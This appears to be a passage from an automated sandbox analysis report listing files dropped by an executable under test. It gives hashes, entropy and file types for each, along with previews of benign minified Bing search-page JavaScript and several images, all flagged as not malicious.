                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3814
                                                                                                                                                                                                        Entropy (8bit):7.634659202076907
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                                                                                                                        MD5:281570611F89219A970F2589F98A09DB
                                                                                                                                                                                                        SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                                                                                                                        SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                                                                                                                        SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):924
                                                                                                                                                                                                        Entropy (8bit):5.195012633286773
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                                                                                                                        MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                                                                                                                        SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                                                                                                                        SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                                                                                                                        SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (902), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):902
                                                                                                                                                                                                        Entropy (8bit):5.200751776659475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:Hl7/nJ4aZUv+MW/sRdrwq50n+pM12vk1Q4W3Idc4Wn:d/Caq+M93H5kOaC3Idmn
                                                                                                                                                                                                        MD5:76ED74A9FD9A74443976389C069CC74A
                                                                                                                                                                                                        SHA1:03AE45E49077B7D87D7FCC434574BA49F95664E3
                                                                                                                                                                                                        SHA-256:B443A3D58AEC4919E37DF4629F8C759A43091B1F63B5A815F8052DF0D8D46804
                                                                                                                                                                                                        SHA-512:D2D13DA2F47C2E94DB3A3B9B6F5185C8352268B1D336BAAA856177BE4B098535BD71BC53819FC73C0F4970DABCB7ECC7F375B4DEB1C25B25474551204B6921F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var HeaderPlusAlgo_Selector;(function(n){function e(n){for(var u,l,h,e=[],c=t(sj_b.querySelectorAll(f+(n?", :focus":""))),s=0;s<c.length;s++)u=c[s],u.className.indexOf("b_ans")!=-1||u.id=="b_pole"?(l=t(u.querySelectorAll(r)),l.length==0&&(h=o(u),h&&e.push(h))):i(u)||e.push(u);return e}function t(n){for(var i=[],t=0;t<n.length;t++)i.push(n[t]);return i}function i(n){if(n){var t=window.getComputedStyle(n);return t&&t.display=="none"?!0:i(n.parentElement)}return!1}function o(n){for(var r,e=t(n.querySelectorAll(u)),f=0;f<e.length;f++)if(r=e[f],!i(r)&&r.tabIndex!=-1)return r;return null}var r="#b_results h2 a,#b_results h3 a,#b_results h4 a",u="input, select, textarea,a[href],*[tabindex = '0']",f=r+",#b_results .b_ans,#b_content #b_pole,#b_content #b_topw";n.getSelectableElements=e})(HeaderPlusAlgo_Selector||(HeaderPlusAlgo_Selector={}));NavSelector=HeaderPlusAlgo_Selector.getSelectableElements
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                        Entropy (8bit):5.394520629964255
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                                                                                                                                                        MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                                                                                                                                                        SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                                                                                                                                                        SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                                                                                                                                                        SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5387
                                                                                                                                                                                                        Entropy (8bit):7.799957991588148
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                                                                                                                        MD5:69D162774F894FF8B920330E376B7A62
                                                                                                                                                                                                        SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                                                                                                                        SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                                                                                                                        SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1833), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1833
                                                                                                                                                                                                        Entropy (8bit):5.03858600819449
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:Jk08PkQix8QboQO7cxfFb87c9nH40VtN3HCBuNDbHNxpA:sPb6oZY80tVbHDtTA
                                                                                                                                                                                                        MD5:D7365C424E30CB142A85B84C0618D671
                                                                                                                                                                                                        SHA1:7212FE88CD0686A381ACB1B0583A544AE3ADA1B0
                                                                                                                                                                                                        SHA-256:8FD0225B5F75EE2326ADC68A10F5B9FC50C30A45BF4B61C7EE9364103E6102C8
                                                                                                                                                                                                        SHA-512:26D9A5DA2CC591954C6014B4DE1826653C9F058E9C8287342D8F0F2C9960BDAF30E1D4F8ADDF529830327D94C8BCA21848A3ADAF2846036A5E9C618992B18D5F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var ExtendIconClickTargetV2;(function(){function n(){var u=document.querySelectorAll(".b_tpcn"),e,r,f,n,i,t;if(u)for(e=function(n){var r=u[n],i,t,f;if(r&&(r.onclick=function(n){if(!n||n.target===r){var t=r.querySelector(".tilk");t&&(_w.si_T&&_w.si_T(t.getAttribute("h")),t.click())}},i=r.nextElementSibling,i&&(r.addEventListener("mouseover",function(){r.style.cursor="pointer";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="underline")}),r.addEventListener("mouseout",function(){r.style.cursor="";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="")}),t=i,!t||t.classList&&t.classList.contains("b_title")||t.tagName==="H2"||t.tagName==="H3"||(t=t.querySelector("h2, h3")),t))){if(f=t.querySelector("a"),!f)return{value:void 0};t.addEventListener("mouseover",function(n){n&&n.target===t&&(t.style.cursor="pointer",f.style.textDecoration="underline")});t
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1580), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1580
                                                                                                                                                                                                        Entropy (8bit):5.0552055236738624
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:CFIaycqwxXvP6D0oagJXOd9TFlk2g8y7t/agPeC2RWgRWK5RWtYFGNKlZxvNGb30:5apDEDM8P2wgwK5wtnwlnNGbBpfGbVjN
                                                                                                                                                                                                        MD5:56AFA9B2C4EAD188D1DD95650816419B
                                                                                                                                                                                                        SHA1:C1E4D984C4F85B9C7FB60B66B039C541BF3D94F6
                                                                                                                                                                                                        SHA-256:E830AEB6BC4602A3D61E678B1C22A8C5E01B9FB9A66406051D56493CC3087B4B
                                                                                                                                                                                                        SHA-512:D97432E68AFDAA2CFAEFF497C2FF70208BD328713F169380D5AFB5D5EECD29E183A79BEC99664DBEE13FD19FE21EBAE7396315AC77A196BFB0AB855507F3DACF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var Lib;(function(n){var t;(function(n){function u(n,t){var r,i;if(t==null||n==null)throw new TypeError("Null element passed to Lib.CssClass");if(n.indexOf)return n.indexOf(t);for(r=n.length,i=0;i<r;i++)if(n[i]===t)return i;return-1}function f(n,u){if(n==null)throw new TypeError("Null element passed to Lib.CssClass. add className:"+u);if(!r(n,u))if(i&&n.classList)n.classList.add(u);else{var f=t(n)+" "+u;o(n,f)}}function e(n,f){var e,s,h;if(n==null)throw new TypeError("Null element passed to Lib.CssClass. remove className:"+f);r(n,f)&&(i&&n.classList?n.classList.remove(f):(e=t(n).split(" "),s=u(e,f),s>=0&&e.splice(s,1),h=e.join(" "),o(n,h)))}function s(n,t){if(n==null)throw new TypeError("Null element passed to Lib.CssClass. toggle className:"+t);i&&n.classList?n.classList.toggle(t):r(n,t)?e(n,t):f(n,t)}function r(n,r){var f,e;if(n==null)throw new TypeError("Null element passed to Lib.CssClass. contains className:"+r);return i&&n.classList?n.classList.contains(r):(f=t(n),f)?(e=f.split("
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):576
                                                                                                                                                                                                        Entropy (8bit):5.192163014367754
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                                                                                                                        MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                                                                                                                        SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                                                                                                                                                        SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                                                                                                                        SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1045
                                                                                                                                                                                                        Entropy (8bit):7.812007487462295
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2YvL3J/eQWCXbwIoGryAFXt3jwRDa9W3TH:Rv1NHUIbrzU3TH
                                                                                                                                                                                                        MD5:2AA8CAB3D7B05D1540A69E6DA11C916B
                                                                                                                                                                                                        SHA1:4F7B7A5776B3806E0195245C82E476B2CB943B14
                                                                                                                                                                                                        SHA-256:BE40B55ED2C02CA68A1527E8B50CB949FFF17EC444504F9ABCE98C97EBAD1738
                                                                                                                                                                                                        SHA-512:FEC6CD89DA1CC4630A229567101F83D979860F6CDF34FEA00174052FDEE93F00F8F0AA489C565F6CD1BCEE3124DFCB1DCE9418FBA7B3983EF6F6946C8689B241
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (918), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):918
                                                                                                                                                                                                        Entropy (8bit):5.212381384143468
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                                                                                                                                                        MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                                                                                                                                                        SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                                                                                                                                                        SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                                                                                                                                                        SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34732
                                                                                                                                                                                                        Entropy (8bit):5.452487645923916
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                                                                                                                                                        MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                                                                                                                                                        SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                                                                                                                                                        SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                                                                                                                                                        SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1725
                                                                                                                                                                                                        Entropy (8bit):5.274895734185393
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                                                                                                                                                        MD5:2EF3074238B080B648E9A10429D67405
                                                                                                                                                                                                        SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                                                                                                                                                        SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                                                                                                                                                        SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2016
                                                                                                                                                                                                        Entropy (8bit):5.3161096027675105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                                                                                                                                                        MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                                                                                                                                                        SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                                                                                                                                                        SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                                                                                                                                                        SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4547
                                                                                                                                                                                                        Entropy (8bit):7.735536921390623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                                                                                                                        MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                                                                                                                        SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                                                                                                                        SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                                                                                                                        SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (622), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):622
                                                                                                                                                                                                        Entropy (8bit):5.265947581512117
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                                                                                                                                                        MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                                                                                                                                                        SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                                                                                                                                                        SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                                                                                                                                                        SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (888), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):888
                                                                                                                                                                                                        Entropy (8bit):5.1970220185324045
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                                                                                                                                                        MD5:F1CF1909716CE3DA53172898BB780024
                                                                                                                                                                                                        SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                                                                                                                                                        SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                                                                                                                                                        SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
